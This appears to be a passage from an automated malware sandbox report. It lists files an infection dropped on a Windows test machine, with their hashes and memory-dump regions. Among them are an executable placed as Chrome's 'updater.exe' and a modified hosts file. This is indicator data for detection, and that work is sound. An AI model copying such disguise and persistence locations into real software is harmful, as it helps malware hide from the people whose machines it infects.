SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

memory/1736-277-0x0000000002790000-0x0000000002B88000-memory.dmp

\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

\Users\Admin\Pictures\Opera_installer_231005044838508672.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/2672-289-0x0000000000400000-0x000000000046A000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-K1DN3.tmp\zderJRyjOZCRyK26wvChSu1Z.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

C:\Users\Admin\AppData\Local\Temp\is-K1DN3.tmp\zderJRyjOZCRyK26wvChSu1Z.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/1236-295-0x0000000000240000-0x0000000000241000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/672-306-0x0000000000C90000-0x00000000011DD000-memory.dmp

memory/304-307-0x000000013F230000-0x000000013F773000-memory.dmp

memory/1404-308-0x0000000004920000-0x0000000004960000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a122618d7c3c4eb5d77cbef8914b2787
SHA1 d49fc7c4d78bf7e9d981ffef06c6d585d5987575
SHA256 3ab9f366ed6d4363ce1f74883272bd29788a8f3dfc4487155c6fbd8e86abf763
SHA512 b23bcc54dfe56aefaf8f8e9408de32d5ebffb69d2c8c08ef56e24fc919dff2fbaf7d1e96ff119e164183fa7b8e5b10b8c53cb423a653a08a1f198a31b77821ba

memory/2108-320-0x000000000A2E0000-0x000000000A82D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a12c5021eb7c60290cd26a28ac3dfe0
SHA1 666e8fc7178c24a6d07587b3743e0d72ef922188
SHA256 6e4dca334cec150b1bcc512b0a71a5a319c013bcbd1f19c843d3529487a0df2c
SHA512 2c75f0532859a1e3a35b11dd2c247a314081657e5dba5078eac8bf5ec9b1cc20aad9f3065182bce204deac32b05c8cfe437573afbbeb5653c99f2a9b129f5a37

memory/1404-335-0x0000000074A20000-0x000000007510E000-memory.dmp

memory/1184-336-0x00000000002D0000-0x00000000003D0000-memory.dmp

memory/1184-337-0x00000000001C0000-0x00000000001FE000-memory.dmp

memory/1184-338-0x0000000000400000-0x00000000005B9000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 887be49b921134baea0aed9002ea425e
SHA1 ac68166c38c5f0da03b4a5077b04cc626a06372d
SHA256 4cadba27b526211509f661aa69f368c602cf20e847e19225954ae919e0c6ef67
SHA512 05c00f7d08e73c9ff65b31e8de6680431f2ef0187d3f8f699238ba0d5cabe79c8a6c2010483eab6b3d5edd8a4e476ab9bad40183b13940add39ccad9aaa51ce6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a0a56f42a0f3b9460a7480268c968fd4
SHA1 66275f589a3ee02e29fcbb449bbfc7925c883ac4
SHA256 cc641c9e4513f52a85441f457fdd238b076bd59a438b0b37a1d48a81b9f41cb9
SHA512 02cf2d558bccaa0ac00cb5b2d64848f14befc47e505b1093dacf605782ba451ddc3cdc12878badec5e977eeeed5f08be1b608ea4b4bf0a77250ede1214c3057a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 addff171bc71e17ba1533a6facc5a109
SHA1 b4ff23f0b182e5dc5e2f62b488a309f907da1613
SHA256 1e36087d237374e96e08fc185d99d3beb85d6475ee9aa2d5673fac4efa2834b0
SHA512 0531d4024ce6f047915d058630e5635745e6182c841d52e291a1e90b15177b7f239bb551683e90674a299d62f00bcc2e25c6653466d87a8036fcdef983e2facd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c977a6f2e972c73f92573f83b5e1a2c3
SHA1 194a8cf5627e73b17bcf690d981518ea7321254f
SHA256 922c4cd27fd24851f901514169a4f2c4c1cb7ba1aa60517409570bdb41973d43
SHA512 8da9c2794bef180900166666aa54430a186d2a579b78139ea7129433fea6d0f32384ffeccb4bb9293fb4de7318e0323290856974f9030eac03baf1edb32d628a

C:\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/2296-403-0x0000000000CA0000-0x0000000000D24000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2c942ed5f507a5393207620c4f748867
SHA1 74d3716f766f4290b98f750c68ed5fc670288892
SHA256 e7b2938d10a3df576962eaa0035ab1e9d8b72978a4b8afc015a51b5b82903242
SHA512 3e38a67746e6ce777cb457e8302397271e00749420a80bbb887baee8ac761f1419cbe6dbe0e48cdd13f196828f4372a27cf77b7d410cbb058d01ec73025154a4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSFEKABI8ISC1C0Y92BW.temp

MD5 2c942ed5f507a5393207620c4f748867
SHA1 74d3716f766f4290b98f750c68ed5fc670288892
SHA256 e7b2938d10a3df576962eaa0035ab1e9d8b72978a4b8afc015a51b5b82903242
SHA512 3e38a67746e6ce777cb457e8302397271e00749420a80bbb887baee8ac761f1419cbe6dbe0e48cdd13f196828f4372a27cf77b7d410cbb058d01ec73025154a4

memory/1840-411-0x000000001B230000-0x000000001B512000-memory.dmp

memory/1840-412-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/2296-416-0x00000000003D0000-0x0000000000432000-memory.dmp

\Users\Admin\AppData\Local\Temp\3205974479.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

C:\Users\Admin\AppData\Local\Temp\3205974479.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

C:\Users\Admin\AppData\Local\Temp\3205974479.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

\Users\Admin\AppData\Local\Temp\3205974479.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

memory/1972-421-0x00000000023D0000-0x0000000002834000-memory.dmp

memory/2296-422-0x00000000022F0000-0x000000000234E000-memory.dmp

memory/1840-426-0x000007FEF3980000-0x000007FEF431D000-memory.dmp

memory/1840-428-0x00000000023AB000-0x0000000002412000-memory.dmp

memory/1840-427-0x00000000023A4000-0x00000000023A7000-memory.dmp

memory/2296-429-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1736-430-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2132-440-0x0000000070F30000-0x0000000070F34000-memory.dmp

memory/1236-448-0x0000000000400000-0x0000000000513000-memory.dmp

memory/1408-450-0x0000000002F70000-0x00000000030E1000-memory.dmp

memory/1184-451-0x00000000001C0000-0x00000000001FE000-memory.dmp

memory/2672-453-0x0000000000400000-0x000000000046A000-memory.dmp

memory/1736-454-0x0000000002790000-0x0000000002B88000-memory.dmp

memory/1184-449-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/1736-455-0x0000000002B90000-0x000000000347B000-memory.dmp

memory/1736-459-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2296-460-0x000000001AF20000-0x000000001AFA0000-memory.dmp

memory/304-457-0x000000013F230000-0x000000013F773000-memory.dmp

memory/2212-461-0x0000000002670000-0x0000000002A68000-memory.dmp

memory/2212-462-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1408-463-0x00000000030F0000-0x0000000003221000-memory.dmp

memory/1404-464-0x0000000004920000-0x0000000004960000-memory.dmp

memory/2212-466-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/672-467-0x0000000000C90000-0x00000000011DD000-memory.dmp

C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c977a6f2e972c73f92573f83b5e1a2c3
SHA1 194a8cf5627e73b17bcf690d981518ea7321254f
SHA256 922c4cd27fd24851f901514169a4f2c4c1cb7ba1aa60517409570bdb41973d43
SHA512 8da9c2794bef180900166666aa54430a186d2a579b78139ea7129433fea6d0f32384ffeccb4bb9293fb4de7318e0323290856974f9030eac03baf1edb32d628a

memory/1236-487-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/304-490-0x000000013F230000-0x000000013F773000-memory.dmp

C:\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

memory/1736-492-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1404-493-0x0000000004920000-0x0000000004960000-memory.dmp

C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Windows\system32\drivers\etc\hosts

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Program Files\7-Zip\OLXZCKNGJG\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/2472-619-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2472-631-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BA5OQ.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1640-670-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2296-695-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/2296-713-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1640-722-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1236-728-0x0000000000400000-0x0000000000513000-memory.dmp

memory/2472-732-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2672-735-0x0000000000400000-0x000000000046A000-memory.dmp

memory/2232-749-0x000000006E760000-0x000000006ED0B000-memory.dmp

memory/1948-750-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/1736-751-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2212-752-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1572-753-0x0000000002800000-0x0000000002801000-memory.dmp

memory/1948-754-0x0000000000650000-0x0000000000750000-memory.dmp

memory/2232-755-0x00000000002E0000-0x0000000000320000-memory.dmp

memory/1948-757-0x00000000002B0000-0x0000000000301000-memory.dmp

memory/2212-758-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1404-799-0x0000000004920000-0x0000000004960000-memory.dmp

memory/2260-813-0x0000000002630000-0x0000000002A28000-memory.dmp

memory/1736-815-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1940-817-0x00000000027E0000-0x0000000002BD8000-memory.dmp

memory/1948-818-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2212-820-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1972-846-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/1972-855-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/3008-857-0x000000013FCF0000-0x0000000140233000-memory.dmp

memory/1948-863-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/1972-864-0x00000000023D0000-0x0000000002834000-memory.dmp

memory/1972-865-0x0000000002840000-0x0000000002D07000-memory.dmp

memory/1972-866-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/1972-872-0x0000000002EC0000-0x0000000003338000-memory.dmp

memory/2260-880-0x0000000002630000-0x0000000002A28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lpksetup-20230831-235444-0.log

MD5 0267d9b5ec66360ed5991650b2b1d779
SHA1 973198def25c8c4e98622d97193961cf9175305e
SHA256 650c837d2df0f58584f177c7819c32bde8f1f953d7286b0c5736a367563a81f5
SHA512 a94e6ebba270d495bc790c7abdec439e0a8ac1854cb5eab3cd06962daeeb4b17183699178402c35f4a6025281eec6a49f6174373cfd25f47652edb182d789785

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 c893d24475a7af160b346124443fc09d
SHA1 8f2d964187fe9ae8c3ec27981c22be9912b2b800
SHA256 0e07436cb016f2e005943120835d9860cbd953026c1698d0920b56e56b71319a
SHA512 41b487ad04feeb199518e201814a3323c7d6a1879e5c8c62d21f63a0c7490e7e9b308cb3395928d93c56c6b0383c50ab593dfc93f97e415bade2bb7a118d2373

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cc2af299aadb82b742c69816b2f4b7e6
SHA1 4e0279e8c37fdba65de111c8649a077f855efd15
SHA256 eeeaa00e40804730c8fe09eb47a9342441469d8ac34118314b85a7099eb08edc
SHA512 2179a59d3d537b4788cb0b0fa7807dabab7f0fdaff1447166c72008682cb58189ebaf821b087971277051e6588cbb2477f1fa6c7bafcf0747e3c00837e17ffb7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8207642c9dedc1f04785aab4d0be3239
SHA1 acfc7a612daeec8fcb9785b87f90c9fb7d684ade
SHA256 1cb497a1863a2c26cef3f862bcc3df09be698541607a0eb9e7afe7685c50614d
SHA512 fdbf6dbaf1473c961b3afb327665ec33978d9079bd9ded17050776ba0a761551dec9861b53e8995cf20d40104832f3d1e16d8c18d124c5eb102730324049e261

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 59b40839ea8d671b489ed21c3b7bba2e
SHA1 fda4daa9a2e669ae426ca6485e0783873c207bcc
SHA256 c5370a22a0a5da7c5f2327176e607e9e72c8830f9b2e6945d58f96d8c6f46ceb
SHA512 8f372b2136372de1f68ea9e43686443f24401732a250f55ad5d9a612325fd871b73e640301caf2caf5f66265809fb2a9642d767fcf38349c20441fbf281edcb3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 17321ed0b17dceb50e488e511eb3daf9
SHA1 166009a6722527b5620b52927accca8fc05e6f9c
SHA256 a92f21d3ce8facdb43bd5a7f03f247ecb8954872f3b50538ef9133dcd12ed021
SHA512 01ad8ea8cfb4469a61c325a8f952d1a2dca9cff1682db953495bd827fff2b4a58059b3868d043fcf4eeda6948b41b4dd21077c0a37d31ea60a1ed8d5a397be7b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ae588f3584375584293618e406e9338
SHA1 90239fcded11a7eeb9fe936b679d455018a9f6cb
SHA256 7955f91b563ff2e35152176e47d5d9aeca70ab3f619ac9c06256cc1be0c410ca
SHA512 340f65abf17f9095ef8d86279b4d040740878c839c519aa4875a0428ef8c2b45b8f34ad8886fa3a54331c6bc4d5413783ae251855026951780ba3798d27abbba

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ed1ed531004b8688891f6ffa2ced142
SHA1 58efd8a6bc01f6f789e772f58c4a42c0bf9c620f
SHA256 c86c7d2263dd4bdb52cd8fb897cbe7f0325c756ee5f5d01ff31d39f1af824b3c
SHA512 e0a9fade91feaf673e045e390bfd8883cdd739103fd97e886af6bdfc9bd7a37ddd668ec4e3a736d8f5a0285ecc216b5c97e3788d5b6f2db1c5c0f2bbec90390a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
